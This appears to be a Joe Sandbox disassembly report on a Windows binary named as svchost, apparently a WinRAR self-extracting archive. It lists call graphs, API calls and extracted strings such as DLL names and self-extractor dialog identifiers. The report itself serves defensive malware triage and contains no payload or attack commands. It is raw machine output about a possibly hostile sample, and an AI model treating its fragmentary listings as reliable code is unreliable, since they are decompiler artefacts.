27839 7ff669aca8de 27838->27839 27897 7ff669ac86b0 16 API calls _handle_error 27839->27897 27841 7ff669aca8eb DeleteObject 27841->27831 27898 7ff669ab8b10 27842->27898 27844 7ff669ab8aee 27965 7ff669ab9644 GetModuleHandleW FindResourceW 27844->27965 27846 7ff669ab8af6 27846->27621 27848 7ff669ad1c40 4 API calls 27847->27848 27849 7ff669ac60b5 27848->27849 27849->27631 27851 7ff669ac8d81 27850->27851 27852 7ff669ac8d8a OleUninitialize 27851->27852 27853 7ff669b0e338 27852->27853 27854->27626 27855->27630 27856->27637 27857->27650 27858->27633 27859->27646 27860->27651 27861->27661 27863 7ff669abd81c GetModuleHandleW 27862->27863 27863->27704 27863->27705 27865 7ff669ab453c GetVersionExW 27864->27865 27866 7ff669ab456f 27864->27866 27865->27866 27867 7ff669ad1d90 _handle_error 8 API calls 27866->27867 27868 7ff669ab459c 27867->27868 27868->27732 27869->27712 27872 7ff669abc99a 27870->27872 27871 7ff669abc9cd 27871->27744 27872->27871 27873 7ff669aa1754 33 API calls 27872->27873 27873->27872 27874->27742 27875->27774 27876->27729 27877->27808 27878->27804 27879->27801 27880->27806 27882 7ff669ac7ef3 SizeofResource 27881->27882 27883 7ff669ac803f 27881->27883 27882->27883 27884 7ff669ac7f0d LoadResource 27882->27884 27883->27825 27884->27883 27885 7ff669ac7f26 LockResource 27884->27885 27885->27883 27886 7ff669ac7f3b GlobalAlloc 27885->27886 27886->27883 27887 7ff669ac7f5c GlobalLock 27886->27887 27888 7ff669ac7f6e BuildCatchObjectHelperInternal 27887->27888 27889 7ff669ac8036 GlobalFree 27887->27889 27890 7ff669ac7f7c CreateStreamOnHGlobal 27888->27890 27889->27883 27891 7ff669ac802d GlobalUnlock 27890->27891 27892 7ff669ac7f9a GdipAlloc 27890->27892 27891->27889 27893 7ff669ac7faf 27892->27893 27893->27891 27894 7ff669ac7ffe GdipCreateHBITMAPFromBitmap 27893->27894 27895 7ff669ac8016 27893->27895 27894->27895 27895->27891 27896->27836 27897->27841 27899 7ff669ab8b32 _snwprintf 27898->27899 27900 7ff669ab8c53 27899->27900 27901 7ff669ab8bb7 27899->27901 27902 7ff669aa3cac 33 API calls 27900->27902 27975 7ff669ab5bbc 48 API calls 27901->27975 27904 7ff669ab8c3d 27902->27904 27906 7ff669ab1890 54 API calls 27904->27906 27905 7ff669aa1fa8 31 API calls 27905->27904 27908 7ff669ab8c79 27906->27908 27907 7ff669ab8bc1 BuildCatchObjectHelperInternal 27907->27905 27963 7ff669ab9635 27907->27963 27909 7ff669ab8c7d 27908->27909 27919 7ff669ab8ccb 27908->27919 27911 7ff669ab1444 97 API calls 27909->27911 27910 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27913 7ff669ab963b 27910->27913 27914 7ff669ab8c86 27911->27914 27912 7ff669ab8d34 27967 7ff669ad6d40 27912->27967 27916 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27913->27916 27914->27913 27917 7ff669ab8cc1 27914->27917 27920 7ff669ab9641 27916->27920 27922 7ff669ad1d90 _handle_error 8 API calls 27917->27922 27919->27912 27923 7ff669ab809c 33 API calls 27919->27923 27921 7ff669ad6d40 31 API calls 27935 7ff669ab8d6f __vcrt_InitializeCriticalSectionEx 27921->27935 27924 7ff669ab9615 27922->27924 27923->27919 27924->27844 27925 7ff669ab8ea3 27926 7ff669ab1e50 98 API calls 27925->27926 27938 7ff669ab8f76 27925->27938 27929 7ff669ab8ebb 27926->27929 27927 7ff669ab1f60 98 API calls 27927->27935 27928 7ff669ab1c80 101 API calls 27928->27935 27932 7ff669ab1c80 101 API calls 27929->27932 27929->27938 27930 7ff669ab1444 97 API calls 27933 7ff669ab95fc 27930->27933 27931 7ff669ab1e50 98 API calls 27931->27935 27936 7ff669ab8ee3 27932->27936 27934 7ff669aa1fa8 31 API calls 27933->27934 27934->27917 27935->27925 27935->27927 27935->27928 27935->27931 27935->27938 27936->27938 27958 7ff669ab8ef1 __vcrt_InitializeCriticalSectionEx 27936->27958 27976 7ff669ac01a8 MultiByteToWideChar 27936->27976 27938->27930 27939 7ff669ab9401 27954 7ff669ab94d6 27939->27954 27993 7ff669adbed0 31 API calls 2 library calls 27939->27993 27941 7ff669ab936d 27941->27939 27979 7ff669adbed0 31 API calls 2 library calls 27941->27979 27942 7ff669ab9361 27942->27844 27945 7ff669ab945e 27994 7ff669ada6fc 31 API calls _invalid_parameter_noinfo_noreturn 27945->27994 27946 7ff669ab95aa 27948 7ff669ad6d40 31 API calls 27946->27948 27947 7ff669ab94c3 27951 7ff669ab7f20 33 API calls 27947->27951 27947->27954 27949 7ff669ab95d4 27948->27949 27952 7ff669ad6d40 31 API calls 27949->27952 27950 7ff669ab809c 33 API calls 27950->27954 27951->27954 27952->27938 27954->27946 27954->27950 27955 7ff669ab9383 27980 7ff669ada6fc 31 API calls _invalid_parameter_noinfo_noreturn 27955->27980 27956 7ff669ab93ee 27956->27939 27981 7ff669ab7f20 27956->27981 27958->27938 27958->27939 27958->27941 27958->27942 27959 7ff669ab9630 27958->27959 27960 7ff669ac055c WideCharToMultiByte 27958->27960 27977 7ff669ab9d14 45 API calls 2 library calls 27958->27977 27978 7ff669ad6b68 31 API calls 2 library calls 27958->27978 27995 7ff669ad2094 8 API calls 27959->27995 27960->27958 27963->27910 27966 7ff669ab9670 27965->27966 27966->27846 27968 7ff669ad6d6d 27967->27968 27974 7ff669ad6d82 27968->27974 27996 7ff669adc5dc 15 API calls _set_fmode 27968->27996 27970 7ff669ad6d77 27997 7ff669ad6834 31 API calls _invalid_parameter_noinfo 27970->27997 27971 7ff669ad1d90 _handle_error 8 API calls 27973 7ff669ab8d51 27971->27973 27973->27921 27974->27971 27975->27907 27976->27958 27977->27958 27978->27958 27979->27955 27980->27956 27982 7ff669ab808e 27981->27982 27983 7ff669ab7f92 27981->27983 27999 7ff669aa2020 33 API calls std::_Xinvalid_argument 27982->27999 27985 7ff669ab8093 27983->27985 27988 7ff669ab7fe7 27983->27988 27990 7ff669ab7fc2 __std_swap_ranges_trivially_swappable 27983->27990 28000 7ff669aa1f88 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 27985->28000 27989 7ff669ad1c40 4 API calls 27988->27989 27988->27990 27989->27990 27998 7ff669ab9ad0 31 API calls _invalid_parameter_noinfo_noreturn 27990->27998 27992 7ff669ab807b 27992->27939 27993->27945 27994->27947 27995->27963 27996->27970 27997->27974 27998->27992 28001 7ff669adae6c 28008 7ff669adab74 28001->28008 28013 7ff669adc380 35 API calls 3 library calls 28008->28013 28010 7ff669adab7f 28014 7ff669adbfa8 35 API calls abort 28010->28014 28013->28010 28015 7ff669ad09b7 28016 7ff669ad1350 _com_raise_error 14 API calls 28015->28016 28017 7ff669ad09f6 28016->28017 28018 7ff669adc818 28019 7ff669adc863 28018->28019 28023 7ff669adc827 _set_fmode 28018->28023 28025 7ff669adc5dc 15 API calls _set_fmode 28019->28025 28021 7ff669adc84a HeapAlloc 28022 7ff669adc861 28021->28022 28021->28023 28023->28019 28023->28021 28024 7ff669adab00 _set_fmode 2 API calls 28023->28024 28024->28023 28025->28022

                                      Executed Functions

                                      Function 00007FF669ABD7F8 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 442libraryfileloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 7ff669abd7f8-7ff669abd84c call 7ff669ad1ec0 GetModuleHandleW 3 7ff669abd84e-7ff669abd861 GetProcAddress 0->3 4 7ff669abd8a3-7ff669abdb97 0->4 5 7ff669abd863-7ff669abd872 3->5 6 7ff669abd87b-7ff669abd88e GetProcAddress 3->6 7 7ff669abdd29-7ff669abdd50 call 7ff669ab5758 call 7ff669ab70b0 4->7 8 7ff669abdb9d-7ff669abdba6 call 7ff669ada6c8 4->8 5->6 6->4 10 7ff669abd890-7ff669abd8a0 6->10 20 7ff669abdd55-7ff669abdd5f call 7ff669ab4518 7->20 8->7 14 7ff669abdbac-7ff669abdbfb call 7ff669ab5758 CreateFileW 8->14 10->4 21 7ff669abdc01-7ff669abdc14 SetFilePointer 14->21 22 7ff669abdd13-7ff669abdd24 CloseHandle call 7ff669aa1fa8 14->22 28 7ff669abdd61-7ff669abdd6c call 7ff669abd5a4 20->28 29 7ff669abdd94-7ff669abddf1 call 7ff669ad68cc call 7ff669aa12c0 call 7ff669ab7334 call 7ff669aa1fa8 call 7ff669ab2680 20->29 21->22 24 7ff669abdc1a-7ff669abdc3c ReadFile 21->24 22->7 24->22 27 7ff669abdc42-7ff669abdc50 24->27 32 7ff669abe0b2-7ff669abe0b7 call 7ff669ad2094 27->32 33 7ff669abdc56-7ff669abdcc0 call 7ff669ad68cc call 7ff669aa12c0 27->33 28->29 38 7ff669abdd6e-7ff669abdd92 CompareStringW 28->38 71 7ff669abddf6-7ff669abddf9 29->71 50 7ff669abdcde-7ff669abdcf8 call 7ff669abc968 33->50 38->29 42 7ff669abde02-7ff669abde0b 38->42 42->20 45 7ff669abde11 42->45 48 7ff669abde16-7ff669abde19 45->48 51 7ff669abde99-7ff669abde9c 48->51 52 7ff669abde1b-7ff669abde1e 48->52 60 7ff669abdcc2-7ff669abdcd9 call 7ff669abd5a4 50->60 61 7ff669abdcfa-7ff669abdd0e call 7ff669aa1fa8 * 2 50->61 56 7ff669abe06e-7ff669abe0b1 call 7ff669aa1fa8 * 2 call 7ff669ad1d90 51->56 57 7ff669abdea2-7ff669abdeb8 call 7ff669ab7170 call 7ff669ab4518 51->57 58 7ff669abde22-7ff669abde87 call 7ff669ad68cc call 7ff669aa12c0 call 7ff669ab7334 call 7ff669aa1fa8 call 7ff669ab2680 52->58 82 7ff669abdebe-7ff669abdf88 call 7ff669abd5a4 * 2 call 7ff669aba008 call 7ff669abd2bc call 7ff669aba008 call 7ff669abd440 call 7ff669ac8050 call 7ff669aa19ec 57->82 83 7ff669abdf8d-7ff669abdff6 call 7ff669abd2bc AllocConsole 57->83 108 7ff669abde89-7ff669abde92 58->108 109 7ff669abde96 58->109 60->50 61->22 76 7ff669abde13 71->76 77 7ff669abddfb 71->77 76->48 77->42 97 7ff669abe060-7ff669abe067 call 7ff669aa19ec ExitProcess 82->97 94 7ff669abe059 83->94 95 7ff669abdff8-7ff669abe053 GetCurrentProcessId AttachConsole call 7ff669abe1d4 call 7ff669abe1c4 GetStdHandle WriteConsoleW Sleep FreeConsole 83->95 94->97 95->94 108->58 111 7ff669abde94 108->111 109->51 111->51
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                      • API String ID: 1496594111-2013832382
                                      • Opcode ID: 3c5b7e40dabb33de2872f4ead57213b737540d03d5136472ac52588d3dd5022b
                                      • Instruction ID: a24a544c5bea87611f38bba23d9e1cdc1afd8d225716b3e56ecbcdbd8b4a92c1
                                      • Opcode Fuzzy Hash: 3c5b7e40dabb33de2872f4ead57213b737540d03d5136472ac52588d3dd5022b
                                      • Instruction Fuzzy Hash: AE32BA75A09BC6D9EB219F24E8402E933F4FB88358F504236DE4D9A769EF38D658D340
                                      Function 00007FF669ACA9C0 Relevance: 122.3, APIs: 59, Strings: 10, Instructions: 1526windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Item$DialogMessageSendTextWindow
                                      • String ID: %s %s$-el%u -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxpipe
                                      • API String ID: 2770254507-1933896953
                                      • Opcode ID: 47fd72c8dc3dfeed7b071f927e3ab4048e50031a0989bb058ad7985187d95abc
                                      • Instruction ID: 61dce6997932d73b6e014a610afeb15b5472b1f5bcdfe01d9ef351758befa653
                                      • Opcode Fuzzy Hash: 47fd72c8dc3dfeed7b071f927e3ab4048e50031a0989bb058ad7985187d95abc
                                      • Instruction Fuzzy Hash: CDE29C62A096C6C2EB209F25E8942FA73B1FF8A794F404635DD4D8F6A6DE7CE544C340
                                      Function 00007FF669ACC9C4 Relevance: 52.5, APIs: 18, Strings: 11, Instructions: 1780COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .lnk$.tmp$<br>$=$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                      • API String ID: 0-81786609
                                      • Opcode ID: 150e0092323b8f52df7a9fddb3b8ccbf727525693b14de4d2849245d68b3973c
                                      • Instruction ID: c75896b782af68b676bf3515725040222e0f608207a0b19e0df183e11f59a9d5
                                      • Opcode Fuzzy Hash: 150e0092323b8f52df7a9fddb3b8ccbf727525693b14de4d2849245d68b3973c
                                      • Instruction Fuzzy Hash: 91039162E08A82D9EB10DF64D8402FC37F1EB95798F501636EE0D9EA99DF78E585C340
                                      Function 00007FF669ACFFF0 Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 397sleeptimewindowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1444 7ff669acfff0-7ff669ad0102 call 7ff669abd7f8 GetCurrentProcess SetUserObjectInformationW call 7ff669ab55f8 call 7ff669ac8cec call 7ff669ae5770 call 7ff669ac92a8 1455 7ff669ad0104-7ff669ad0119 1444->1455 1456 7ff669ad0139-7ff669ad0153 1444->1456 1457 7ff669ad0134 call 7ff669ad1c7c 1455->1457 1458 7ff669ad011b-7ff669ad012e 1455->1458 1459 7ff669ad0155-7ff669ad016a 1456->1459 1460 7ff669ad018a-7ff669ad01a4 1456->1460 1457->1456 1458->1457 1465 7ff669ad0698-7ff669ad069d call 7ff669ad6854 1458->1465 1461 7ff669ad0185 call 7ff669ad1c7c 1459->1461 1462 7ff669ad016c-7ff669ad017f 1459->1462 1463 7ff669ad01db-7ff669ad01f5 1460->1463 1464 7ff669ad01a6-7ff669ad01bb 1460->1464 1461->1460 1462->1461 1462->1465 1470 7ff669ad022c-7ff669ad0238 GetCommandLineW 1463->1470 1471 7ff669ad01f7-7ff669ad020c 1463->1471 1468 7ff669ad01bd-7ff669ad01d0 1464->1468 1469 7ff669ad01d6 call 7ff669ad1c7c 1464->1469 1480 7ff669ad069e-7ff669ad06a3 call 7ff669ad6854 1465->1480 1468->1465 1468->1469 1469->1463 1477 7ff669ad023e-7ff669ad0275 call 7ff669ad68cc call 7ff669aa12c0 call 7ff669acc58c 1470->1477 1478 7ff669ad0409-7ff669ad041f call 7ff669ab5758 1470->1478 1474 7ff669ad020e-7ff669ad0221 1471->1474 1475 7ff669ad0227 call 7ff669ad1c7c 1471->1475 1474->1465 1474->1475 1475->1470 1503 7ff669ad0277-7ff669ad0289 1477->1503 1504 7ff669ad02a9-7ff669ad02b0 1477->1504 1487 7ff669ad0421-7ff669ad0446 call 7ff669aa1fa8 call 7ff669ae50d0 1478->1487 1488 7ff669ad0449-7ff669ad059b call 7ff669aa1fa8 SetEnvironmentVariableW GetLocalTime call 7ff669ab9d6c SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff669aca844 call 7ff669ab8ae0 call 7ff669ac606c * 2 DialogBoxParamW call 7ff669ac6164 * 2 1478->1488 1493 7ff669ad06a4-7ff669ad06a9 call 7ff669ad6854 1480->1493 1487->1488 1563 7ff669ad05a3-7ff669ad05aa 1488->1563 1564 7ff669ad059d Sleep 1488->1564 1502 7ff669ad06aa-7ff669ad06e4 call 7ff669ad1350 1493->1502 1513 7ff669ad06e9-7ff669ad0736 1502->1513 1508 7ff669ad02a4 call 7ff669ad1c7c 1503->1508 1509 7ff669ad028b-7ff669ad029e 1503->1509 1510 7ff669ad039e-7ff669ad03c8 call 7ff669ad68cc call 7ff669aa12c0 call 7ff669acf540 1504->1510 1511 7ff669ad02b6-7ff669ad02f7 call 7ff669aa2c04 call 7ff669aa2830 call 7ff669aa2d94 1504->1511 1508->1504 1509->1480 1509->1508 1534 7ff669ad03cd-7ff669ad03d5 1510->1534 1535 7ff669ad0347-7ff669ad0357 call 7ff669aa1fa8 1511->1535 1536 7ff669ad02f9-7ff669ad0342 call 7ff669ac99a8 call 7ff669acf540 call 7ff669abb2fc call 7ff669abb444 call 7ff669abb4b4 1511->1536 1513->1502 1534->1478 1538 7ff669ad03d7-7ff669ad03e9 1534->1538 1552 7ff669ad0392-7ff669ad039c call 7ff669aa2c2c 1535->1552 1553 7ff669ad0359-7ff669ad0366 1535->1553 1536->1535 1542 7ff669ad0404 call 7ff669ad1c7c 1538->1542 1543 7ff669ad03eb-7ff669ad03fe 1538->1543 1542->1478 1543->1542 1548 7ff669ad0692-7ff669ad0697 call 7ff669ad6854 1543->1548 1548->1465 1552->1478 1558 7ff669ad0381-7ff669ad038d call 7ff669ad1c7c 1553->1558 1559 7ff669ad0368-7ff669ad037b 1553->1559 1558->1552 1559->1493 1559->1558 1567 7ff669ad05b1-7ff669ad05d4 call 7ff669abb228 DeleteObject 1563->1567 1568 7ff669ad05ac call 7ff669ac975c 1563->1568 1564->1563 1574 7ff669ad05dc-7ff669ad05e2 1567->1574 1575 7ff669ad05d6 DeleteObject 1567->1575 1568->1567 1577 7ff669ad05e4-7ff669ad05eb 1574->1577 1578 7ff669ad05fe-7ff669ad060f 1574->1578 1575->1574 1577->1578 1579 7ff669ad05ed-7ff669ad05f9 call 7ff669aab160 1577->1579 1580 7ff669ad0623-7ff669ad0630 1578->1580 1581 7ff669ad0611-7ff669ad061d call 7ff669acf658 CloseHandle 1578->1581 1579->1578 1584 7ff669ad0632-7ff669ad063f 1580->1584 1585 7ff669ad0655-7ff669ad065a call 7ff669ac8d64 1580->1585 1581->1580 1588 7ff669ad064f-7ff669ad0651 1584->1588 1589 7ff669ad0641-7ff669ad0649 1584->1589 1590 7ff669ad065f-7ff669ad0691 call 7ff669ad1d90 1585->1590 1588->1585 1592 7ff669ad0653 1588->1592 1589->1585 1591 7ff669ad064b-7ff669ad064d 1589->1591 1591->1585 1592->1585
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: EnvironmentVariable_invalid_parameter_noinfo_noreturn$CurrentHandleObject$AddressDeleteDirectoryModuleProc$CloseCommandDialogIconInformationInitializeLineLoadLocalMallocParamProcessSleepTimeUserswprintf
                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxpipe
                                      • API String ID: 2472672504-4073604590
                                      • Opcode ID: 2d5a130e2447de21d2a193f423de8e68c9d137093d14339f823ff5af5c5eca19
                                      • Instruction ID: d6b06fb300a4300716a6c023d8cf1dc222ed8068d22e0cf6624d9ba0523e86c8
                                      • Opcode Fuzzy Hash: 2d5a130e2447de21d2a193f423de8e68c9d137093d14339f823ff5af5c5eca19
                                      • Instruction Fuzzy Hash: 1C12AB62E08B96C5EB10DF24E8451BD73B1BF89794F404231EE5D8EAAADF6CE545C340
                                      Function 00007FF669AB96B4 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 286windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1595 7ff669ab96b4-7ff669ab9738 call 7ff669ab9d6c call 7ff669ac055c call 7ff669ad6900 1602 7ff669ab979d-7ff669ab980b call 7ff669ab8638 GetWindowRect GetClientRect 1595->1602 1603 7ff669ab973a 1595->1603 1609 7ff669ab9811-7ff669ab9813 1602->1609 1610 7ff669ab98d3-7ff669ab98d8 1602->1610 1604 7ff669ab9741-7ff669ab9744 1603->1604 1607 7ff669ab9789-7ff669ab9797 1604->1607 1608 7ff669ab9746-7ff669ab9758 call 7ff669ad9760 1604->1608 1607->1604 1612 7ff669ab9799 1607->1612 1608->1607 1619 7ff669ab975a-7ff669ab9775 call 7ff669ab8a34 1608->1619 1613 7ff669ab9910-7ff669ab9937 GetSystemMetrics GetWindow 1609->1613 1614 7ff669ab9819-7ff669ab98ce GetWindowLongPtrW call 7ff669b0e2c0 GetWindowRect 1609->1614 1610->1613 1615 7ff669ab98da-7ff669ab98fe call 7ff669ab87e0 1610->1615 1612->1602 1620 7ff669ab9aa6-7ff669ab9acf call 7ff669ad1d90 1613->1620 1621 7ff669ab993d-7ff669ab9942 1613->1621 1614->1610 1615->1613 1627 7ff669ab9900-7ff669ab990a SetWindowTextW 1615->1627 1619->1607 1631 7ff669ab9777-7ff669ab9783 SetDlgItemTextW 1619->1631 1621->1620 1626 7ff669ab9948 1621->1626 1630 7ff669ab994d-7ff669ab9953 1626->1630 1627->1613 1630->1620 1632 7ff669ab9959-7ff669ab9a13 GetWindowRect call 7ff669aa22c8 1630->1632 1631->1607 1635 7ff669ab9a5e-7ff669ab9a99 call 7ff669b0e2c0 GetWindow 1632->1635 1636 7ff669ab9a15-7ff669ab9a27 call 7ff669b0e2a0 1632->1636 1635->1620 1642 7ff669ab9a9b-7ff669ab9aa0 1635->1642 1636->1635 1641 7ff669ab9a29-7ff669ab9a5c SendMessageW 1636->1641 1641->1635 1642->1620 1642->1630
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Window$Rect$Text$ByteCharClientItemLongMessageMetricsMultiSendSystemWideswprintf
                                      • String ID: $%s:$CAPTION$ComboBox
                                      • API String ID: 3712066475-505312980
                                      • Opcode ID: 9ca0a9535a6f528d9f625c2520a76509113134b1d5fd78addab9c38dcd152dff
                                      • Instruction ID: 6984b6f71b2d4d7ccd12c6c8ead12e35d88c264f8139abf97838b70b4e20e788
                                      • Opcode Fuzzy Hash: 9ca0a9535a6f528d9f625c2520a76509113134b1d5fd78addab9c38dcd152dff
                                      • Instruction Fuzzy Hash: CEB1D332A186458AE718DF69E9046BA7BB1FBC5784F445135EE8D8BB98CF3CE405CB40
                                      Function 00007FF669AC7EC8 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101memorywindowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                      • String ID: PNG
                                      • API String ID: 211097158-364855578
                                      • Opcode ID: a25f39ae10c779b16d69999f18453697fb6aa4e96e536294cb6300c2a78311ad
                                      • Instruction ID: 273f7374d5a47f4f3b0a00b918eedd02001978ab48b4bedc84ec930aa50a27b3
                                      • Opcode Fuzzy Hash: a25f39ae10c779b16d69999f18453697fb6aa4e96e536294cb6300c2a78311ad
                                      • Instruction Fuzzy Hash: 4B41E561A09B46C2EA449F6AA49437973F0BF88B94F080435DE1D8F3A4EF7DE849D340
                                      Function 00007FF669AAE3D0 Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 580COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
